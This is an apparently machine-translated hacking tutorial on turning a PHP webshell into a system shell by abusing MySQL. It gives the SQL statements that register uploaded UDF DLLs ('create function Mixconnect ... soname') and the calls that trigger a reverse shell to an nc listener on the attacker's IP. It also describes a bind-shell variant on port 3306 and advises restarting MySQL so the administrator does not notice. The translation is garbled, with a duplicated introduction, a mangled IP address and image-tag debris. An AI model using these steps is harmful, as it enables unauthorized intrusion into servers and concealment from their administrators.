WEBSHELL Privilege Escalation (Mysql vulnerability)

Comments: The S-serv method is used by everyone. As a result, the current host configuration is very secure. It seems that the endless stream of attack methods is also one of the major reasons for China's network security improvement, there are other pcanywhere tools for getting passwords, replacing services, and so on. But now we are not doing this well. With the improvement of security awareness, the previous method is not very useful. Now I will introduce to you that S-serv is a method that everyone will use, as a result, all hosts are configured very securely. It seems that the endless stream of attack methods is also one of the major reasons for the progress in China's network security. There are other pcanywhere tools for getting passwords and replacing services. However, it is not so easy now. With the improvement of security awareness, the previous method is not very useful. Now I will introduce you to a new method of Elevation of Privilege, do anyone who has seen the animation made by classical LM know it? Using the weak password of MYSQLl to obtain system permissions can also be achieved on WEBSHEL, but there is a premise that the target host is equipped with MYSQL, and you know the MYSQL user and password, can be obtained. After WEBSHELL is obtained, it is not difficult to find the user and password. Now I use another machine as an example. I have uploaded PHPSHELL. 1
500) this. width = 500 "title =" Click here to browse images in a new window "/>
Generally, the account and password used to connect to MYSQL are very easy to find. You can edit a PHP file and you will see it. 2
500) this. width = 500 "title =" Click here to browse images in a new window "/>
Now, what should I do if I have the username: root Password: 123456 Database Name: php? Use SQL Query to establish a connection.
500) this. width = 500 "title =" Click here to browse images in a new window "/>
Now that the connection is successful, we start to drop our Elevation of Privilege: Mix. dll My_udf.dll Upload first. OK, transfer it, Mix. dll is used to rebound the connection. My_udf.dll is a forward connection. You can directly connect to port 3306 of the other party and enter the password to obtain the mongoshell. Well, let's not talk about it. After it is uploaded, execute the following SQL statement create function Mixconnect returns string soname 'd: \ php \ Mix. dll '; to register the function.
The SQL statement is successfully executed! 4
500) this. width = 500 "title =" Click here to browse images in a new window "/>
It's not far from getting mongoshell. First, we first use NC to listen to a port locally. First, Nc-l-p 1234 (I don't think so) and then execute the statement: select Mixconnect ('2017. 168.1.254 ', '123'); to activate that function, 5
500) this. width = 500 "title =" Click here to browse images in a new window "/>
The execution is successful, and then check whether our NC has been reflected. 6
500) this. width = 500 "title =" Click here to browse images in a new window "/>
The CMSHELL is successfully obtained, but the MYSQL of the other party is suspended. We need to kill the MYSQL service process and restart the MYSQL service. Otherwise, the Administrator will find that the website cannot run, that's it .... If the server is not allowed to connect to any external IP address and port, its port 3306 is opened externally! In this case, My_udf.dll should be on the stage. The method is the same as Mix. After successful connection to MYSQL, run the following statement: create function my_udfdoor returns string soname 'd: \ php \ my_udf.dll '; after the statement is successfully executed, we start to activate the function, input the statement: select my_udfdoor (''), and connect to port 3306 with nc, then input f ** k to get an external shell 7.
500) this. width = 500 "title =" Click here to browse images in a new window "/>
OK! The test is over.